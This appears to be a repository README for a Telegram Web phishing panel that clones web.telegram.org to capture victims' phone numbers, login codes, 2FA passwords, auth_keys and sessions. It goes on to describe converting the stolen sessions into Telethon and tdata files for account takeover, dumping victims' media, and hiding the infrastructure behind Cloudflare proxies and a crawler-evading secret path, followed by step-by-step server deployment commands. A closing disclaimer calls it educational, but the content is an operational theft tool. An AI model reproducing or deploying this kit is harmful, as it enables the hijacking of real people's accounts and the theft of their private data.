Full-featured Telegram Web Phishing Panel - Public Version . 100% clones official web.telegram.org. Steals auth_key + full session from localStorage. Shows victim's real IP & device — zero suspicion.
- Uses original Telegram client code (no custom APP_ID/HASH)
- Telegram sees legitimate web session → no auto-bans or session kills
- Victim sees their real IP/device exactly like in official client
- Captures: phone, code, 2FA, auth_key, full session
- Convert auth_key → Telethon (.session)
- Convert → tdata folder (direct login)
- Instant login via Telegram Desktop Portable
- Media dump (photos, videos, files)
- Logs archive export
- Detailed victim statistics
- Multi-domain via Cloudflare proxy (hidden server IP + free SSL)
- Bot WebApp mode (domain completely invisible)
- Add 2+ domains → enable proxy (orange cloud)
- Full SSL/TLS
- Add secret path key to evade crawlers (e.g.
/connect)
→ Phishing link:https://yourdomain.com/connect
- Ubuntu 22.04 + NGINX
- 2+ Cloudflare-proxied domains ready
- Tools: WinSCP + PuTTY
- Convert key → tdata
- Download Telegram Desktop Portable
- Run once → tdata folder appears
- Replace contents with stolen tdata
- Launch → logged in
- sudo apt update
- sudo apt install -y nginx ufw
- sudo ufw allow "Nginx Full"
- sudo ufw allow "OpenSSH"
- sudo ufw enable
- curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
- sudo apt install -y nodejs
- sudo apt install -y python3.10 python3-pip python3-venv
- sudo apt install -y build-essential zlib1g-dev libncurses5-dev libgdbm-dev \
- libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget libbz2-dev
- Bot → /root/main.py + /root/bot/.env (BOT_TOKEN + ADMIN_ID)
- TWeb → /var/www/tweb/
- nano /var/www/tweb/src/index.ts # line ~85
- If build caches old domain → edit manually in:
- /var/www/tweb/dist/index-*.js
- /var/www/tweb/public/index-*.js
- cd /var/www/tweb
- npm install -g pnpm
- pnpm install
- → /var/www/tweb/node_modules/vite/dist/node/chunks/
- cd /root/bot
- pip install -r requirements.txt
- pip install fastapi telebot aiohttp_socks "uvicorn[standard]"
- sudo mkdir /root/logs
- sudo cp bot.service tweb.service main.service /etc/systemd/system/
- sudo systemctl daemon-reload
- sudo systemctl enable bot.service tweb.service main.service
- sudo cp tweb.conf work.conf /etc/nginx/conf.d/
- tweb.conf → server_name your-phishing-domain.com;
- work.conf → server_name your-api-domain.com;
- sudo systemctl daemon-reload
- sudo systemctl start bot.service tweb.service main.service
Note: This project is intended solely for educational purposes and authorized testing. Any unauthorized or malicious use is strictly prohibited. The developer is not responsible for any misuse of the provided materials.
Join our community for discussions and support:
- Discord Server
- Issues Page for bug reports and feature requests.
Contributions are welcome! If you have ideas for improving configurations or adding new templates, please submit a pull request. Ensure all contributions align with the educational and ethical goals of this project.
Licensed under the MIT License for educational and authorized security testing purposes only. See LICENSE for details.